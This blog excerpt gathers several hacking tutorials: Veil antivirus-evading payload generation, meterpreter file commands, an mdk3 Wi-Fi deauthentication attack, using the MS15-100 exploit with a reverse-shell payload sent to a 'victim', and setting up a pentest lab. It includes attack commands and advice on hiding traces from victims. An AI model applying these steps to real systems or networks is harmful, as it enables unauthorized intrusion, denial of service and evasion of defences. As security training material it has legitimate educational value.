Posted on

Beginners guide to Veil framework

Hello, aspiring ethical hackers. In our previous blogpost, you learnt about some Antivirus bypass techniques used by hackers to keep their payloads undetected. In this blogpost, you will learn about Veil Framework, a tool to generate Metasploit payloads that can bypass common anti-virus solutions.

Veil framework is officially supported by Debian 8 and Kali Linux rolling 2018+. It may also be run on Arch Linux, Manjaro Linux, Black Arch Linux, Deepin 15+, Elementary, Fedora 22+, Linux Mint, Parrot Security, Ubuntu 15.10+ and Void Linux.

For this tutorial, we will be using Kali Linux. Veil framework can be installed either directly or can be downloaded from Github. Veil can be installed on Kali using apt as shown below.

This simple command will install all the dependencies and software Veil requires like Wine etc.

After successful installation, Veil can be started using the command shown below.

As you can see, Veil has two tools installed: Evasion and Ordnance. Let’s focus on the evasion part for this article. We can use the command shown below to the evasion tool.

As you can see, Veil is saying that 41 payloads have been loaded and it is displaying the commands available in Veil Evasion menu. To see all the payloads veil can create, use command “list” as shown below.

You can select the payload you want to create as shown below. For example, here I want to create powershell/meterpreter/rev_tcp.py payload. So, I use its number as shown below.

Along with payload information, the options required for this payload are also displayed along with the available commands.

The required options can be set just like Metasploit. For example, set lhost using command

Set lhost <attacker ip>

After all the options are set, we can create the payload using “generate” command.

You will be prompted to give a name to your output payload. Click Enter to continue. The payload is successfully created as shown below.

Posted on

Complete guide to meterpreter: Part 1

Hello aspiring hackers. In this article we present you a meterpreter cheat sheet. Since I am writing many howtos on how to exploit different vulnerabilities in both web and operating systems using Metasploit, I thought may be it would be very helpful for beginners to make a guide to Meterpreter since it is the most widely used payload for our exploits. That begs the question as what is a payload which further begs the question of what is an exploit.

To be put clearly, exploit is “a defined way in which to take advantage of the given vulnerability”. Imagine a house ( containing lots and lots of money ) is locked with a complex number lock decoding which is almost impossible, but the lock has a weakness. If you hit it very hard, the lock may break. This is its vulnerability. Now to take advantage of this vulnerability, we need something like HAMMER to hit it very hard. Here, hammer is our exploit.

Now let us define payload. A payload defines what exactly we want to do after a system is exploited. And here, meterpreter is our payload. Meterpreter has lot of advantages over other payloads. It is powerful, extensible and most importantly stealthy. It uses encrypted communication, writes nothing to disk and doesn’t create any new processes. Ok, Ok, Ok. That’ s lot of theory. Now let’s get to the main concept of this howto. For this howto, I have exploited a Windows system with Kali Linux and acquired a meterpreter session. As soon as you get the meterpreter session, type “?” or “help”. This will give all the commands available with meterpreter. In this Part 1. we will see all the file system commands. As the name implies these commands are used in filesystem manipulation.

1. pwd

The first command we will see is “pwd” which stands for “print working directory”. It shows the current working directory in the remote system as shown below.

2. cd

“cd” stands for “change directory”. This command is used to change our working directory in the remote machine. The command “cd ..” means going one directory back. Here we did it twice to go to the “C:\” directory.

3. ls

The “ls” command is used to list files and directories. For example, I want to see the contents of Desktop in my remote system. Navigate to that directory and type command “ls”. As shown below, we can see the files and directories on Desktop in remote machine.

4. cat

The “cat” command allows us to create single or multiple files, see contents of file, concatenate files and redirect output in terminal or files as we require. Here, we will use the “cat” command to view the contents of the file h323log present on the remote system as shown below.

5. edit

“edit” command is used to edit the file. It will open the file in Vi editor in which we can make changes as shown below.

Here I have deleted two lines in the file.

6. mv

The “mv” command is used to move the files to another directory as shown below. Here, we have moved the file h323log.txt to another directory called “cracked”.

7. search

The “search” command is used to search for specific files in the remote system as shown below.

8. download

The “download” command is used to download any files from the remote system to our system. For example, let us download the samspade file present on the Desktop of remote system to our system as shown below.

9. lpwd, getlwd, getwd

The “lpwd” and “getlwd” commands are used to print local working directory i.e the working directory of attacker system. The “getwd” command is used to get the working directory of remote system.

10. lcd

The “lcd” command is used to change the local working directory as shown below.

11. upload

The “upload” command is used to upload any files to the remote system from our local system. Here, we have to give the exact path of the remote system where we want to upload our file as shown below.

12. rm

The “rm” command is used to delete files in the remote system. We use this command generally to delete any executable files we have uploaded so that our victim doesn’t get any suspicion.

13. rmdir

The “rmdir” command is used to delete directories since “rm” command cannot do it. Its usage is shown below.

meterpreter cheat sheet

14. mkdir

The “mkdir” command is used to create new directories or folders on the remote system as shown below.

Hope this meterpreter cheat sheet was helpful. I will be back with “part 2” of meterpreter cheat sheet soon.

Want to learn how Black Hat hackers hack? Subscribe to our Digital Magazine Now.

Posted on

Beginners guide to mdk3

Good Evening friends. Today we will learn how to perform Wifi DOS attack on Wifi networks. We will use a tool called mdk3 which is inbuilt in Kali Linux and we need a compatible wifi adapter for this attack. A Dos attack stands for Denial Of Service attack. If all is set, open a terminal and type command “mdk3” to see various attacks available in this tool as shown below.

wifi dos

Scroll down to see more options. We can see the various testing modes available in this tool. We will use the deauthentication attack for this Wifi DOS. As the name implies, this attack disconnects all clients connected to the wifi network.

Before we start our attack, we have to start our adapter in monitor mode. Type command “airmon-ng start wlan0“. (where wlan0 is your wifi interface and may differ for you).

Then type command “mdk3 mon0 d -i <ESSID name>” and you will see the tool disconnecting all the clients connected to the Wifi network you are targeting. Here,

“mon0” – is the interface where monitor mode has been started. This can be different for you.

d – is the de authentication mode

ESSID – is the name of the Wifi network.

Hope this was helpful. Learn how to crack wifi passwords.

Posted on 2 Comments

Using MS15-100 vulnerability to hack Windows

Hello aspiring ethical hackers. In this howto, we will see how to hack Windows 7 with MS15-100 with recently released ms15-100 Microsoft Windows Media Center MCL exploit. For this, I am gonna use pentest lab i created in our previous howto. I am using Kali Linux as my attacker system for hacking windows 7.

Start Metasploit by typing command “msfconsole”. Search for our exploit using command as shown below.

hack windows 7

Load the exploit as shown below.

Set the IP address of Kali Linux to “srvhost” option. Set payload as “windows/meterpreter/reverse_tcp“. Set Lhost as IP address of Kali Linux.

Check if all the necessary options are set by typing command “show options“. Now run the exploit by typing command “exploit“. You will get the following result. Now copy the underlined link and send it to your victim.

When your victim clicks on the link, he will get a popup asking him to download and save the file.

When the user clicks on the downloaded file, we will get a meterpreter session on our attacker system as shown below. Type command “sessions -l ” to see the available sessions. We have one session available below.

Type command “sessions -i 1“( 1 is the session number available to us and can vary for you) to use the meterpreter session. Type “sysinfo” to know about the target system. Hurrah, we have successfully hacked our target.

That’s how we hack Windows 7 with MS15-100 exploit.

Posted on 1 Comment

Create a web application penetration testing lab

Good Evening friends. Today we will see a step by step guide on how to create a web application penetration testing lab .

For creating this lab, I am using a host machine with Windows 7 installed on it. We also need the following software.

1. Wamp server ( Download here)

2. Vulnerawa ( Download here )

3. Vmware Workstation or Oracle Virtualbox ( Download here )

4. Kali Linux ( Download here )

Download the above software to your system. Install Wamp server. For this WAPT lab, we will use Vulnerawa as a vulnerable website or target website. Extract the contents of the vulnerawa.zip folder to the root folder of the Wamp server. Now open a browser and and type localhost in the URL bar to see if you can see the victim webapp as shown below.

Click on “Create Database” to create some data which we will use in our future howto’s.

Now let’s change the permissions of the Wamp server to access it from our attacker machine. Go to Apache>httpd.conf as shown below.

You should see the httpd.conf as shown below. Type CTRL+F and search for word “stuff”. After you find it, make changes as shown below in the red box. Save the file by typing CTRL+S and restart the Wamp server.

Now install Kali Linux in Vmware Workstation or Oracle Virtualbox (see how ). Set the network adapter to NAT. Now open command line in your host machine and check the IP address assigned to your host machine as shown below by typing command “ipconfig”. Since I am using Vmware Workstation my network adapter is Vmware network adapter vmnet8. The IP address assigned to my host machine is 192.168.64.1.

Now start your attacker machine( Kali Linux ), open browser and type the address 192.168.64.1 in the url bar and see if you can access the victim web application as shown below.

web application pentest lab

Your web application penetration testing lab is ready. Happy hacking practice.